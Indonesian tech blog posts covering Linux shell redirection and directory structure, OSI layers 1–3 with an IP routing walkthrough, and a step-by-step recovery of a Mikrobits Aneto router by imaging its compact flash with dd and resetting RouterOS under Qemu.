Perhatikan perbedaan output dari kedua perintah. Yang pertama ada file /etc/passwd, yang ke dua tidak ada karena perintah wc -l mengambil input dari stdin, bukan file /etc/passwd.

Ada mode lain di redirect, dengan dua karakter redirection << atau >>.
Bedanya dengan dua karakter, modenya adalah append.

Langsung saja dengan contoh.

cat /etc/passwd | grep "nobody" > user

Command ini kalau diulang 5 kali, isi file user tetap sama.

nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin

Tapi dengan mode append, atau dua karakter redirect

cat /etc/passwd | grep "nobody" >> user

Isi file user kalau command diulang lima kali.

nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin

Dengan dua karakter redirect, output atau input ditambahkan di bawahnya.

Struktur Direktori Linux
Di Linux, tidak ada drive C: atau drive D: seperti di Windows.

Di Linux, gambaran struktur direktori seperti di bawah:

/                           # root
 |
 |-- home                   # Direktori untuk user
 |
 |-- etc                    # /etc: direktori yang berisi konfigurasi
 |   
 |-- tmp                    # /tmp: temporary
 |   
 |-- usr
 |       /
 |
 |       |--  bin           # /usr/bin: Berisi executable program
 |       |    
 |       |--  lib           # /usr/lib: Berisi library program
 |       |
 |       |--  share
 |       |    
 |       |--  local
 |                 /
 |                  | 
 |                  |-- bin
 |                  |
 |                  |-- lib
 |                  | 
 |                  |-- share
 |-- dev                            # /dev: Berisi device node
 |       /
 |       |--  disk
 |
 |-- var
        /
         |
         |-- lib
         |   
         |-- log
         |   
         |-- cache

Seperti terlihat, struktur direktori seperti percabangan pohon. Paling atas disebut root, karakter / dan diikuti cabangnya, misal /usr/local/share.

Kalau di Windows, biasanya program yang terinstall ada di direktori C:\Program Files. Di Linux berbeda, program yang terinstall filenya tersebar di beberapa direktori.
Misalnya program Vlc player, program executablenya di /usr/bin/vlc. Library-nya terinstall di /usr/lib/vlc, dokumentasi di /usr/share/vlc.
Kelebihannya dari Windows, kalau ada beberapa program membutuhkan library yang sama, atau istilahnya shared library, cukup memakai library yang sudah ada di direktori /lib, /usr/lib, atau /usr/local/lib. Satu libarary dipakai bersama-sama, dan hasilnya ukuran program jadi kecil.

Struktur direktori Linux mengikuti standar FHS (Filesystem Hierarchy Standard) Wikipedia, silahkan dipelajari.

Absolute dan relative path
Absolute path adalah path yang dimulai dari / (root), misalnya /etc/passwd.
Relative path, path yang dimulai dari current directory atau working directory. Current directory bisa diketahui dengan command pwd.

# Dengan absolute path
cat /etc/passwd

# Dengan relative path
$ cd /etc           # cd /etc, pindah working directory ke /etc
$ cat passwd

Command cat yang ke dua tidak perlu /etc karena working directory adalah /etc.

Navigasi
Ada beberapa karakter spesial untuk navigasi direktori.

. (dot): current directory.
.. (double dot): naik satu direktori.
~ (tilde): home directory.

Contoh:

$ cd /usr/local/share       # Pindah ke direktori /usr/local/share
$ cd .                      # Tetap di tempat.
$ pwd                       # Print working directory
/usr/local/share
$ cd ..                     # Naik satu direktori
$ pwd
/usr/local
$ cd ..
$ pwd
/usr
$ cd ~                      # Pindah ke home directory
$ pwd
/home/administrator

Setelah paham hal di atas, maka nantinya tidak akan bingung kalau ketemu command yang ada karakter aneh seperti |, >, .., ~, dan seterusnya.

Di tulisan selanjutnya kita akan mulai bahas program-program dari Coreutils.

Terima kasih.

[EDIT]
Artikel selanjutnya: Belajar Linux Dasar - Manajemen file

Belajar Jaringan Komputer Dasar - Layer OSI 1, 2, dan 3

2016-04-15T23:45:00+08:00

Photo credit: www.freedigitalphotos.net

Pernah satu waktu saya ke toko komputer buat beli switch, tapi sama penjualnya disodorkan hub. Saya bilang switch bukan hub, penjualnya bilang sama saja karena bentuknya sama.
Tentu saja saya maklum karena memang penjaga toko komputer tidak belajar jaringan, jadi tidak paham kalau hub itu perangkat jaringan layer 1 dan switch perangkat layer 2. Tapi, Saya juga pernah menemui beberapa orang yang belajar jaringan komputer tapi kurang memahami dasar jaringan.

Buat mereka yang mau jadi praktisi jaringan atau bahasa kerennya network engineer tentu saja harus paham dasar jaringan. Bagaimana perangkat-perangkat jaringan itu dihubungkan, bagaimana cara kerjanya, dan seterusnya.

Kalau belajar jaringan komputer, yang paling pertama harus dipahami adalah OSI Model. OSI (Open Systems Interconnections) model adalah pembagian segmen-segmen jaringan, ada 7 lapis atau layer dalam satu jaringan menurut OSI.
Jadi kalau diumpamakan jaringan itu seperti institusi, ada departemen-departemen tertentu yang tugasnya beda-beda tapi saling berhubungan. Begitu juga jaringan, layer-layer itu tugasnya juga beda-beda.

Saya waktu pertama kali mempelajari jaringan, konsep 7 layer ini buat saya waktu itu terasa asing. Saya menghabiskan berhari-hari untuk membaca tentang ini, dan akhirnya tidak bisa paham juga. Akhirnya, ada titik terang waktu Saya langsung berpraktek membuat jaringan dan dari sini konsep layer jaringan mulai Saya pahami.

Seperti disebutkan, OSI membagi jaringan kedalam 7 lapisan atau 7 layer. Dan karena konteks tulisan ini jaringan komputer, maka kita akan batasi saja dari layer 1 sampai layer 3. Layer 4 sampai 7 tidak akan dibahas karena tidak begitu berkaitan dengan jaringan.

Pengenalan layer OSI 1, 2, dan 3

Pada tulisan ini, saya akan coba jelaskan masing-masing layer dari layer 1 sampai layer 3 termasuk fungsi serta contoh protokol yang berjalan di masing-masing layer.
Masing-masing layer OSI mempunyai nama:

Layer 1 : Physical layer atau lapisan fisik jaringan.
Layer 2 : Data link layer atau lapisan link jaringan.
Layer 3 : Network layer.

Untuk memberi gambaran apa dan bagaimana layer-layer itu, saya analogikan layer-layer di atas ke proses pengiriman paket barang. Misalnya, saya mau kirim paket dari kota Balikpapan ke Papua. Proses bagaimana cara supaya paket tersebut bisa sampai itu sama seperti proses routing di jaringan komputer. Saya bisa pakai jasa kurir, kemudian paket Saya itu dibawa ke bandara pakai mobil, kemudian diterbangkan yang mungkin saja ada transit di kota Makassar, dan seterusnya sampai akhirnya paket tersebut diterima di Papua.

Dari analogi diatas, saya umpamakan layer 1 adalah jalan. Jalan ini bentuknya bisa darat, laut atau udara.
Layer 2 adalah kendaraan. Kendaraan bisa mobil, pesawat, sepeda motor, atau kapal.
Sedangkan layer 3 adalah jasa kurir paket itu. Dan dalam jaringan, paket yang dikirim itu disebut payload.

Kembali ke OSI, layer 1 itu dinamakan layer fisik, atau bagaimana jaringan bisa terhubung secara fisik. Fisik jaringan bisa berupa kabel tembaga, seperti kabel telepon atau kabel UTP, bisa juga pakai wireless tanpa kabel, atau bisa juga dengan kabel fiber optic yang menggunakan cahaya.

Layer 2, atau layer data link adalah bagaimana jaringan terhubung melalui data link. Di layer ini ada perangkat-perangkat yang terhubung secara link, perangkat layer 2 contohnya switch dan bridge. Perangkat di layer 2 ini masing-masing punya identitas yang disebut MAC address.

Layer 3, atau layer network. Perangkat-perangkat jaringan yang termasuk di layer ini seperti router, PC, laptop, server, smartphone dan sebagainya. Perangkat di layer ini masing-masing juga punya identitas yang unik yang namanya IP address atau alamat IP.

Coba kita lihat gambar di bawah

Gambar di atas itu cuma satu jaringan sederhana, bagaimana HOST A bisa berkomunikasi dengan HOST B.
HOST A, HOST B, dan ROUTER X adalah perangkat layer 3. Sedangkan SWITCH 1 dan SWITCH 2 ada di layer 2. Masing-masing garis berwarna merepresentasikan layer. Layer 1 dengan garis hitam, layer 2 dengan garis merah dan layer 3 dengan garis biru. Seperti terlihat, biarpun jaringan di gambar satu tapi kalau dilihat dari masing-masing layer ternyata ada banyak jaringan. Ada empat jaringan layer 1, dua jaringan layer 2 dan satu jaringan layer 3.

Empat jaringan layer 1 tersebut adalah:

HOST A ke SWITCH 1
SWITCH 1 ke ROUTER X
ROUTER X ke SWITCH 2
SWITCH 2 ke HOST B

Dua jaringan layer 2:

HOST A ke SWITCH 1 ke ROUTER X
ROUTER X ke SWITCH 2 ke HOST B

Satu jaringan layer 3:

HOST A ke ROUTER X ke HOST B

Penting untuk diingat, setiap perangkat di layer tertentu harus mempunyai jaringan layer dibawahnya tapi tidak sebaliknya. Misalnya, perangkat layer 3 harus punya jaringan layer 2 dan jaringan layer 1, tapi perangkat layer 2 tidak harus punya jaringan layer 3.
Ingat lagi analogi pengiriman paket di atas, kendaraan yang ada di layer dua harus punya jaringan layer 1 atau ada jalannya tapi tidak sebaliknya. Kurir butuh kendaraan, dan kendaraan perlu jalan. Tapi sebaliknya tidak, jalanan tidak perlu ada mobilnya, dan mobil tidak butuh kurir.

Kemudian setiap jaringan cuma aware jaringan yang berada satu layer dan tidak peduli jaringan dibawahnya. Dalam contoh gambar, HOST A, HOST B dan ROUTER X yang ada di layer 3 tidak akan melihat jaringan layer 2 dan layer 1. Jadi biarpun SWITCH 1 dan SWITCH 2 di layer 2 diganti dengan perangkat bridge, perangkat layer 3 tidak akan tahu atau mempermasalahkannya.
Begitu juga layer 2, tidak akan mempermasalahkan media transmisi di layer 1, apakah itu terhubung lewat kabel optik, kabel tembaga atau wireless.

Di masing-masing layer jaringan, ada beberapa protokol yang bisa berjalan di layer tersebut, dan dalam artikel ini kita akan pakai contoh yang umum dipakai. Kita hanya akan ambil contoh di layer 2 dan 3, sedangkan layer 1 atau layer fisik tidak karena layer 1 tidak ada protokol jaringan, layer 1 itu fisika sekali.
Di layer 2, protokol yang umum dipakai di jaringan sekarang adalah protokol Ethernet sedangkan di layer 3 yang umum adalah protokol IP. Nanti kita bahas protokol-protokol ini.

Sedikit tentang IP (Internet Protocol), ketika disebut IP maka kebanyakan dari kita berpikir ip address semisal 192.168.1.1. Ini kesalahan yang membingungkan, yang dimaksud dengan IP adalah protokol Internet, sedangkan 192.168.1.1 disebut alamat IP atau IP address, hanya saja kebanyakan orang menyebutnya dengan IP saja dan menyebabkan kebingungan buat yang tidak paham.
Kalau misalnya IP adalah perumahan, maka alamat IP adalah alamat rumah, sesuatu yang berbeda. Dan supaya tidak tambah bingung, di artikel ini dibedakan antara IP dan IP address.

Protokol Ethernet dan Protokol IP

Kita bahas dari layer 1 dulu. Di layer 1 atau layer fisik, media transmisi jaringan bisa berupa kabel entah itu kabel tembaga atau kabel fiber optic, atau bisa juga wireless.

Cara kerjanya, kalau kita ingat atau pernah belajar sandi Morse, kurang lebih seperti itu. Jadi data atau dalam Morse berupa huruf dikodekan ke dalam signal-signal. Di kabel tembaga, signal ini dikodekan ke dalam aliran listrik. Di kabel optik, data atau paket atau payload itu akan dikodekan dengan signal menggunakan gelombang cahaya. Sedangkan di wireless, signal dikodekan menggunakan gelombang elektromagnetik yang ada di rentang frekuensi radio, yang umum ada di frekuensi radio 2,4 GHz dan 5,8 GHz.
Kemudian perangkat layer 1 yang menerima signal-signal kode tersebut akan menerjemahkan kode yang diterima untuk kemudian diteruskan ke layer diatasnya yaitu layer 2.

Di layer 2, ada protokol Ethernet. Di protokol ini, paket Ethernet mempunyai alamat asal dan alamat tujuan. Alamat tersebut disebut alamat MAC (Media Access Control) atau MAC Address. Format alamat MAC adalah 48 bit bilangan heksadesimal. Contohnya 80:c1:6e:59:2e:43, ini alamat MAC laptop Saya. Seperti dijelaskan sebelumnya, setiap perangkat layer 2 punya MAC Address yang unik.

Ambil contoh dalam perangkat switch dengan 8 buah port, alamat-alamat MAC yang bertetangga dengan switch tersebut dan yang berada dalam satu jaringan layer 2 disimpan di tabel yang disebut FDB (forwarding database) dan dari database ini bisa diketahui alamat MAC A terhubung di port 1 misalnya. Jadi waktu ada paket datang ke switch itu, dan tujuan alamat MAC A maka paket tersebut akan dikirimkan melalui port 1, bukan port yang lain.

Di layer 3, ada protokol IP. Ini adalah protokol yang kita gunakan saat ini untuk berkomunikasi dengan jaringan seluruh dunia. Di protokol IP, juga ada alamat asal dan tujuan yang disebut alamat IP, 192.168.1.1 contohnya.
Misalnya untuk mengakses Youtube yang ada di server Google, paket yang kita kirimkan akan melewati banyak perangkat layer 3 berupa router. Router-router ini tidak melihat alamat asal, hanya alamat IP tujuan yang dilihat. Paket yang kita kirim ke Google terlebih dulu akan dikirim ke router Telkom kalau berlangganan Telkom. Kemudian dari Telkom dikirim lagi ke router Telin, begitu seterusnya sampai diterima di alamat IP tujuan terakhir yaitu server Google.

Kemudian yang perlu diingat juga, paket Ethernet hanya bisa berada di layer 2. Karena itu paket Ethernet tidak bisa melewati sebuah router karena router itu perangkat layer 3.

Perhatikan gambar dibawah:

Gambar di atas itu adalah gambar jaringan Ethernet di layer 2. Dengan jaringan seperti itu, BRIDGE 1 bisa berkomunikasi dengan BRIDGE 2 lewat protokol Ethernet.

Sekarang, bagaimana kalau di jaringan itu ditempatkan router di tengahnya.

Dengan adanya router, karena router itu perangkat layer 3, maka jaringan Ethernet terputus dan terbagi jadi dua jaringan Ethernet. Kalau seperti ini, BRIDGE 1 tidak lagi bisa berkomunikasi dengan BRIDGE 2 karena sudah beda jaringan.

Sampai di sini mungkin timbul pertanyaan, kenapa harus ada jaringan Ethernet dan jaringan IP? bukankah cara kerja dua jaringan itu hampir sama? dan kenapa kita tidak pakai salah satu jaringan saja?
Baik, kita akan coba bahas itu.

Perbedaan jaringan Ethernet dan jaringan IP, jaringan Ethernet lebih simple dibanding IP. Karena simple-nya itu dan karena Ethernet ada di layer 2, jaringan Ethernet lebih cepat dibanding jaringan IP di layer 3.
Tapi, juga karena simple-nya Ethernet itu, jaringan jadi susah diatur dibandingkan IP. Mengatur jalur rute paket Ethernet lebih sulit, mengatur keamanan jaringan Ethernet juga lebih sulit dibanding jaringan IP. Intinya, jaringan Ethernet itu rawan error dan mencari sumber masalah di jaringan Ethernet jauh lebih sulit dari jaringan IP.

Saya pernah menangani jaringan wireless, hanya sekitar 20 perangkat jaringan yang terkoneksi lewat jaringan Ethernet. Waktu itu salah satu perangkat radio bermasalah dan menyebabkan broadcast storm, satu jaringan itu jadi down karena ini. Mencari sumber masalahnya pun perlu waktu lama.
Bisa dibayangkan, dari sekitar 20 perangkat yang saling terhubung, satu saja yang bermasalah dan satu jaringan bisa mati karena itu. Bagaimana kalau ada ratusan bahkan ribuan perangkat yang terkoneksi lewat jaringan Ethernet?

Di sisi lain, jaringan IP memang sedikit lebih lambat dibanding Ethernet tapi menawarkan fitur yang tidak ada di Ethernet. Dari segi manajemen, monitoring, dan troubleshooting, jaringan IP lebih mudah. Karena itu, saat ini protokol Internet yang kita pakai dan dipakai di seluruh dunia pakai protokol IP karena IP lebih cocok untuk jaringan yang besar.

Lalu apakah jaringan IP bebas masalah? jawabannya tidak. Kalau Anda pernah ingat di bulan November tahun 2012, layanan Google sempat tidak bisa diakses oleh sebagian besar pengguna Internet di dunia selama kurang lebih setengah jam. Dan setelah ditelusuri, penyebabnya karena kesalahan konfigurasi router dari ISP Moratelindo di Indonesia, baca beritanya di sini

Sebenarnya, dengan memakai protokol IP maka secara otomatis jaringan juga memakai jaringan Ethernet. Hanya saja, jaringan Ethernet tersebut dipotong-potong menjadi jaringan kecil dan banyak sehingga gampang diatur. Setiap layer tertentu memerlukan layer di bawahnya, ingat?
Lihat kembali gambar terakhir dimana kita tempatkan router di tengah-tengah jaringan Ethernet, dan jaringan Ethernet itu terbagi jadi dua. Dengan begitu, ketika ada problem di jaringan Ethernet yang satu, maka jaringan Ethernet yang kedua tidak terpengaruh.

Proses Routing paket IP

Mari sekali lagi lihat gambar jaringan IP yang pertama. Misal HOST A mau kirim data ke HOST B, maka prosesnya seperti di bawah:

HOST A

Encapsulation. Pertama, data yang akan dikirim terlebih dulu harus dibungkus ke paket yang disebut paket IP. Proses ini namanya encapsulation.
Routing table lookup. Setelah jadi paket IP, dicari tahu bagaimana caranya paket IP tersebut bisa sampai ke HOST B, atau mencari jalur rute yang harus dilewati, proses ini disebut routing table lookup. Dari proses ini bisa diketahui bahwa untuk mengirim paket ke HOST B, terlebih dulu paket IP harus dikirim ke ROUTER X.
Address resolution. Setelah diketahui bahwa paket harus dikirim ke ROUTER X, tugas selanjutnya mencari tahu alamat MAC ROUTER X. Proses ini disebut Address Resolution, Protokolnya disebut ARP (Address Resolution Protocol). Proses address resolution berjalan di layer 2.
Encapsulation. Paket IP yang akan dikirim ke alamat MAC ROUTER X itu dibungkus lagi kedalam paket Ethernet. Berbeda dengan encapsulation yang pertama yang membungkus data ke paket IP, encapsulation yang kedua membungkus paket IP ke paket Ethernet dan ditujukan ke alamat MAC ROUTER X.
Setelah diketahui alamat MAC ROUTER X, selanjutnya dicari tahu bagaimana cara mengirim paket Ethernet ke alamat MAC ROUTER X. Dari sini diketahui kalau mau kirim paket Ethernet ke ROUTER X, paket Ethernet itu harus dikirim melalui kabel.
Data Transmission. Ini adalah proses pengiriman data dan proses ini ada di layer 1. Paket akan dikodekan ke signal-signal listrik melalui kabel yang terhubung ke SWITCH 1.

SWITCH 1

Di layer 1, signal diterima dan diterjemahkan ke paket Ethernet untuk kemudian diteruskan ke layer diatasnya, yaitu layer 2.
Di layer 2, protokol Ethernet akan melihat kemana alamat tujuan paket Ethernet itu. Karena alamat tujuan adalah MAC address ROUTER X, maka paket dikembalikan ke layer 1 untuk dikirim ke ROUTER X.
Di layer 1, paket dikirim dengan signal listrik lewat kabel yang terhubung ke ROUTER X.
Langkah-langkah dari 1 sampai 3 disebut switching.

ROUTER X

Di layer 1, signal diterima, diterjemahkan ke paket Ethernet dan diteruskan ke layer 2.
Di layer 2, paket Ethernet diperiksa tujuannya. Karena alamat MAC tujuan untuk ROUTER X sendiri, maka paket Ethernet tidak diteruskan tapi dibuka. Setelah dibuka, dan karena isinya adalah paket IP, maka paket IP ini kemudian diteruskan ke layer 3.
Di layer 3, paket IP akan dilihat alamat IP tujuannya dan ternyata tujuan paket IP itu bukan ke ROUTER X, tapi ke HOST B.
Routing table lookup, mencari rute ke HOST B.
Di layer 2, address resolution, mencari alamat MAC HOST B.
Encapsulation. Paket ip kembali dibungkus ke paket ethernet, ditujukan ke alamat MAC HOST B.
Di layer 1, Transmit. Data dikirim dengan signal-signal lewat kabel yang terhubung ke SWITCH 2.

SWITCH 2

Layer 1, menerima signal dan menerjemahkan signal ke paket Ethernet, dan meneruskannya ke layer 2.
Di layer 2, paket Ethernet dilihat kemana tujuannya. Tujuan paket ke HOST B, maka dikembalikan ke layer 1.
Di layer 1, paket di-transmit atau dikirim ke HOST B dengan signal lewat kabel.

HOST B

Layer 1 di HOST B menerima signal, menerjemahkan kode signal tersebut ke paket Ethernet dan meneruskan paket tersebut ke layer 2.
Di layer 2, protokol Ethernet melihat kemana tujuan paket itu.
Karena alamat MAC tujuan adalah HOST B sendiri maka paket Ethernet dibuka dan kembali menjadi paket IP. Paket IP ini diteruskan ke layer 3.
Di layer 3, protokol IP melihat alamat IP tujuan. Karena alamat IP tujuan adalah HOST B sendiri, maka paket dibuka dan diteruskan ke layer di atasnya yaitu layer 4.

Sampai sini paket IP sudah diterima di HOST B, tinggal diproses di layer diatasnya. Tapi karena tulisan ini hanya membatasi sampai layer 3, maka layer diatasnya itu tidak dibahas. Kalau Anda tertarik dengan layer 4, silahkan cari tahu tentang protokol TCP dan protokol UDP.

Begitulah kira-kira proses routing, bagaimana paket IP yang berasal dari HOST A bisa sampai ke HOST B. Proses yang panjang sebenarnya, tapi ternyata semua proses itu memakan waktu hanya sekian mili detik.

Saya harap tulisan ini bisa memberikan pengetahuan dasar bagaimana jaringan komputer itu dibangun. Dan setelah memahami konsep dasar ini, maka pembelajaran jaringan berikutnya seperti switching, bridging, atau routing bisa lebih mudah dimengerti.

Dan terakhir kalau artikel ini dirasa berguna, silahkan di-share ke mereka yang sedang belajar dasar jaringan.

Terima kasih dan selamat belajar jaringan.

Artikel Berkaitan:
Materi lanjutan. Jaringan Layer 3, IP routing
Apa yang terjadi di layer 3? IP routing, routing protocol, dan sedikit dynamic routing protocol

Reset Mikrobits Aneto tanpa serial console

2016-04-04T22:12:00+08:00

System error tidak bisa diakses, tombol reset tidak berfungsi, kabel console pun tidak ada, kombinasi yang pas sekali. Lalu apa yang bisa dilakukan untuk memperbaiki router Mikrobits dengan kondisi seperti ini? Tidak banyak tapi ada, dengan Linux masih ada yang bisa dilakukan.

Itu yang kami alami beberapa waktu lalu. Router Mikrobits Aneto milik salah satu pelanggan kami yang error. Parahnya, kabel console untuk router tersebut hilang. Lebih parahnya lagi, kabel console router lain seperti kabel serial console Cisco tidak bisa dipakai untuk Mikrobits tersebut.

Pada kondisi seperti ini, router sama sekali tidak bisa diakses. Telnet, ssh, winbox, mac-telnet, layer 2 ataupun layer 3 tidak ada yang bisa. Karena itu, saya tidak diberi banyak pilihan kecuali melakukan reset dengan cara yang tidak biasa.

Tentang Mikrobits Aneto

Mikrobits, jenis apapun adalah hardware router x86, dan tidak di desain oleh MikroTik, hanya saja menggunakan sistem operasi MikroTik RouterOS. Mikrobits jenis Aneto mempunyai 10 port, 2 port sfp dan 8 port Gigabit Ethernet. Router ini juga memiliki port serial console rj45. Lucunya, pinout untuk serial tidak umum, artinya kabel serial console seperti milik Cisco atau HP tidak bisa dipakai untuk router ini. Disk yang dipakai router ini menggunakan complact flash, dan tidak ada hard disk sata yang terpasang.

Mikrobits Aneto mempunyai tombol yang kemungkinan tombol reset, tidak ada tulisan atau keterangan reset. Waktu dicoba reset dengan tombol ini, yang jadi bukannya reset tapi reboot. saya juga sudah pindah jumper untuk tombol tersebut, tapi waktu ditekan malah jadinya shutdown. Karena console yang tidak umum dan tombol reset yang tidak berfungsi, router ini adalah router teraneh yang pernah Saya temui. Satu-satunya yang memudahkan adalah cpu architecture hardware ini yang x86.

Dengan kondisi seperti ini, cara paling mudah dengan memakai cf adapter, adapter untuk compact flash dengan interface SATA atau IDE.
Dengan adapter ini disk compact flash Mikrobits bisa dijalankan di pc dan kemudian di reset melalui pc tersebut. Tapi kalau tidak ada cf adapter, atau tidak mau beli, maka cara resetnya sedikit lebih panjang.

Metode reset

Cara untuk reset kalau dibuat ringakasan seperti ini.

Menjalankan sistem operasi Linux di hardware Mikrobits, kemudian login ke router lewat ssh.
Dari Linux di Mikrobits drive compact flash dibuat disk image.
Image tersebut kemudian dicopy ke PC / laptop dengan OS Linux.
Image dijalankan secara virtual dengan Qemu, kemudian di reset.
Setelah image di reset kemudian image dicopy kembali ke Mikrobits.
Image di flash kembali ke disk compact flash Mikrobits, dan
selesai.

Perlengkapan

Beberapa perlengkapan perlu disiapkan.

PC Desktop.
Hard disk sata.
Kabel sata.
Kabel UTP.
Image Linux live dan
Laptop atau PC dengan os Linux.

Untuk image live Linux saya menggunakan VyOS, ini os untuk router kelas enterprise, sedangkan laptop Saya pakai OS Debian.

STOP!, sebelum melanjutkan saya minta baca terlebih dahulu paragraf paling akhir.

Langkah-langkah reset

Saya anggap live OS memakai VyOS. Download image VyOS kalau belum ada di http://vyos.uv.es/iso/release/1.1.7/ gunakan yang 32 bit saja dengan kode arch i586. Setelah download image iso bisa di burn ke cd, atau dibuat live di flash disk.

Langkah selanjutnya, jalankan VyOS di pc kemudian install ke hard disk. Setelah VyOS up dan running, install VyOS ke hard disk dengan perintah dibawah:

install image

Ikuti panduan instalasi VyOS sampai selesai, setelah itu reboot pc dan boot dengan VyOS yang sudah terinstall di hard disk. Setelah VyOS running, hidupkan service ssh dengan command dibawah:

$ configure
# set service ssh
# commit
# save
# exit

TAnda dollar ($) adalah mode user, sedangkan tanda pagar (#) adalah mode konfigurasi.

Selanjutnya, kita akan lakukan brute force set ip address untuk 10 port Mikrobits melalui script yang ada di file /config/scripts/vyatta-postconfig-bootup.script. Kita gunakan network 10.11.12.0/28 untuk ip addressnya.

sudo cat >> /config/scripts/vyatta-postconfig-bootup.script << EOF
/sbin/ip addr add 10.11.12.1/28 dev eth0
/sbin/ip addr add 10.11.12.2/28 dev eth1
/sbin/ip addr add 10.11.12.3/28 dev eth2
/sbin/ip addr add 10.11.12.4/28 dev eth3
/sbin/ip addr add 10.11.12.5/28 dev eth4
/sbin/ip addr add 10.11.12.6/28 dev eth5
/sbin/ip addr add 10.11.12.7/28 dev eth6
/sbin/ip addr add 10.11.12.8/28 dev eth7
/sbin/ip addr add 10.11.12.9/28 dev eth8
/sbin/ip addr add 10.11.12.10/28 dev eth9
EOF

Maksud dari script diatas adalah supaya waktu boot, VyOS secara otomatis men-set ip address di interface Mikrobits. Berhubung representasi internal udev tidak diketahui, maka interface dari nomor 1 sampai 10 diset semua.

Langkah selanjutnya, shutdown pc VyOS dan setelah shutdown lepas hard disk yang terinstall VyOS dari PC.
Setelah itu bongkar case router Mikrobits. Di board Mikrobits tersebut ada beberapa port sata, cari sata1 kemudian dengan kabel sata hubungkan port sata1 ke hard disk VyOS. Masalah lagi, di board Mikrobits tidak ada power untuk hard disk sata jadi power untuk hard disk harus diambil dari power supply lain, saya menggunakan power supply yang ada di PC untuk power hard disk.

Dengan kondisi hard disk sata berisi VyOS terpasang di port sata1, hidupkan Mikrobits. Router Mikrobits akan boot dengan VyOS yang ada di hard disk, tunggu beberapa saat sampai VyOS benar-benar up.

Siapkan PC atau laptop dengan OS Linux serta kabel UTP. Hubungkan port ethernet laptop / PC ke port 3 dengan kabel UTP. Set ip address laptop / PC ke 10.11.12.14/28.
Dengan asumsi bahwa interface adalah eth0, set ip address dengan command berikut, user root tentu saja:

ip link set eth0 up
ip addr add 10.11.12.14/28 dev eth0

Kita tidak bisa tahu berapa ip address yang ada di port 3 Mikrobits, karena itu kita ping dengan broadcast atau coba ping ip address satu per satu. Cara ping broadcast:

ping -b 10.11.12.15

Hasilnya, ip address yang reply itu yang terset di port 3 Mikrobits. Apabila tidak ada reply, coba ping ip address satu per satu mulai dari 10.11.12.1 sampai 10.11.12.10. Pada kasus Saya, ip address yang reply 10.11.12.7

Setelah ip address port 3 diketahui, dengan asumsi ip address 10.11.12.7, kita masuk ke bagian yang paling menyenangkan.
Akses router dengan ssh:

ssh vyos@10.11.12.7

Password default untuk user vyos adalah vyos. Selanjutnya, cari tahu nama hard disk yang terinstall dengan command:

sudo fdisk -l

Dari output command fdisk diatas, akan muncul 2 nama hard disk. /dev/sda dan /dev/sdb

WARNING!!! dari dua drive tersebut, kita harus benar-benar yakin mana drive sata mana yang compact flash. Cara mencari tahu bisa dengan melihat kapasitas drive. Misal untuk drive sata yang saya pakai berkapasitas 320GB, output fdisk kurang lebih seperti dibawah.

Disk /dev/sdb: 298.1 GiB, 320072933376 bytes, 625142448 sectors

Dengan begitu, maka /dev/sdb adalah drive sata sedangkan /dev/sda adalah compact flash Mikrobits. Cara lainnya, dengan command df

sudo df -h

Command diatas digunakan untuk mengetahui filesystem yang ter-mount. Artinya filesystem yang ter-mount berarti drive sata. Misalkan /dev/sdb1 ter-mount ke /, maka /dev/sdb adalah drive sata.

Sekali lagi, command setelah ini tidak boleh dieksekusi sebelum drive bisa dipastikan. Risikonya, kehilangan data, kehilangan lisensi RouterOS, dan mungkin juga kacaunya alam semesta.

Sampai disini, kita asumsikan /dev/sda adalah compact flash sedangkan /dev/sdb adalah drive sata. Kita akan membuat disk image dengan source /dev/sda, image tersebut akan dijalankan secara virtual di dalam os Linux, reset konfigurasi RouterOS dan kemudian diflash kembali ke compact flash.

Untuk membuat image:

cd ~
sudo dd if=/dev/sda of=routeros.img bs=1M

Tunggu sampai proses selesai. Setelah selesai, maka di directory /home/vyos akan ada file dengan nama routeros.img dengan besar file sesuai dengan kapasitas drive compact flash. Perintah exit untuk keluar dari console VyOS dan kembali ke terminal Linux di PC / laptop.

exit

Berikutnya, image tersebut dicopy ke PC / laptop dengan os Linux. Silahkan copy dengan cara apa saja, sftp atau scp misalnya.
Dari terminal Linux di PC / laptop, ketik perintah dibawah untuk copy image.

scp vyos@10.11.12.7:/home/vyos/routeros.img ./

Setelah image ter-copy, image tersebut dijalankan secara virtual dengan Qemu. Install Qemu kalau belum terinstall:

apt-get install qemu

Jalankan image dengan Qemu

qemu -nographic routeros.img

Dari sini, setelah system up dan running kita bisa login ke MikroTik dan lakukan reset dengan perintah /system reset-configuration

/system reset-configuration

Tekan “y”, dan sistem akan ter-reset.

Kalau saja cara ini gagal, entah karena system yang error atau tidak bisa login ke MikroTik, masih ada cara lain, netinstall.
Untuk netinstall, cara menjalankan qemu agak sedikit berbeda karena harus ada cdrom untuk cd MikroTik RouterOS-nya. Cara netinstall tidak akan dibahas disini.

Sampai disini, kita sudah punya file image MikroTik yang sudah ter-reset, selanjutnya file image tersebut akan di copy kembali ke Mikrobits dan di flash ke compact flash Mikrobits. Sebelum itu, matikan Qemu kalau masih running.

Copy kembali file routeros.img ke Mikrobits, dan login ssh ke Mikrobits.

scp routeros.img vyos@10.11.12.7:/home/vyos/
ssh vyos@10.11.12.7

Flash image MikroTik yang sudah ter-reset ke compact flash. Sekali lagi, /dev/sda hanya asumsi dan kalau berbeda silahkan disesuaikan.

sudo dd if=routeros.img of=/dev/sda bs=1M

Tunggu sampai selesai, dan setelah selesai shutdhown VyOS Mikrobits dengan command poweroff atau sudo halt.
Cabut kabel sata dari Mikrobits, dan coba hidupkan kembali Mikrobits tanpa drive sata. Jangan lupa berdoa semoga semuanya berjalan lancar.

Apabila berhasil, maka router Mikrobits sudah bisa diakses via layer 2, mac-telnet atau Winbox dengan mac address.

Sebagai penutup, artikel ini adalah cara-cara yang saya pakai untuk reset Mikrobits Aneto dan belum tentu berhasil dengan kasus lain. Apabila tulisan ini dijadikan panduan, maka Saya tidak akan bertanggung jawab apabila langkah-langkah diatas tidak berhasil, terjadi kehilangan data, kerusakan hardware, gangguan pada the Force, dan lain sebagainya.

Inovasi teknologi melawan status quo.

2016-04-02T22:35:00+08:00

